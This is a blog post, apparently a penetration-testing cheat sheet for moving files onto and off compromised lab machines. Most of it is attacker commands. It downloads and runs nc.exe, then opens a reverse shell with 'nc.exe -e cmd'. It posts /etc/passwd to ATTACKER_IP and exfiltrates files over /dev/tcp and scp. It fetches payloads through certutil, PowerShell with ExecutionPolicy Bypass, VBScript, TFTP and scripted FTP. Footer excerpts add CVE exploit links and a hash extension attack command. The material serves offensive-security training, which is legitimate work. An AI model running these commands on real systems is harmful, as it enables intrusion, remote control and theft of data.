Skip to main content

File Transfer Cheat Sheet

By 



Download And Execute a file using Powershell:

on Kali:
python -m SimpleHTTPServer 8001

on Target:
powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe

On Kali:
nc -nvlp 9001

On Target:
C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001 
Sending a file from Victim to Attacker using WGET (Not tested)

wget --post-file=/etc/passwd ATTACKER_IP:8001 

nc -nvlp 9001
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c  --> Transfer files from Kali 

nc YourIpAddress 8001 > /tmp/exploit.c  --> Get the file On Target Machine
Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename 
Downloading a file with just Bash


#paste the below command in the terminal
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-


#download a file using below command
__curl http://10.10.10.10:9001/shell.py > shell.py
Downloading a file using Cert Util:

certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat
Downloading a file without any tool on Target :

on Kali:
nc -nvlp 9001 > backup.7z

on Target:
cat file.7z > /dev/tcp/10.10.14.37/9001

10.10.14.37 --> Kali IP address
Downloading a file using SCP:

scp username@10.10.10.119 file.7z . 

scp -i id_rsa root@10.10.10.10:/root/pass.txt .

scp -P2222 username@website.com:filename .
File Transfer to FreeBSD using Fetch:

on Kali:python -m SimpleHTTPServer 80

On FreeBSD:
/usr/bin/fetch -o 26368.c http://KALI_IP/26368.c 
Download a File using Power Shell:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')
File Transfer using VBScript: This acts like wget/curl

Target Machine (Windows):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

To Download a file:
cscript wget.vbs http://10.10.10.10/nc.exe nc.exe

OR

powershell -ExecutionPolicy Bypass -File wget.ps1 http://10.10.10.10/nc.exe nc.exe

File Transfer using TFTP:

mkdir /share

atftpd --daemon --port 69 /share

cp /usr/share/windows-binaries/nc.exe /share/     //Copy nc.exe to share folder 

On Target Machine:
tftp -i 10.11.0.5 get nc.exe


Non-Interactive File Transfer using FTP --> Script

On Kali:
apt-get update && apt-get install pure-ftpd

Script:

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

chmod 755 setup-ftp
./setup-ftp                     //need to setup a password


On Target Machine:              //Downloading nc.exe using ftp

echo open 10.11.0.5 21> ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt


Downloading Files on Target machine(Powershell Script):

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Execution:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Download a File Using nc.exe:

Receive a File
nc –lvp 8001 > file.txt

nc HOST_IP 8001 

Send A File
nc.exe –l -p 4444 < file.txt  

nc.exe -w 1 127.0.0.1 4444 > file.txt
Labels:

Comments

Post a Comment

Popular posts from this blog

POC Links for CVE's

By
  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main
Post a Comment
Read more

Hash Extension Attacks

By
  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512
Post a Comment
Read more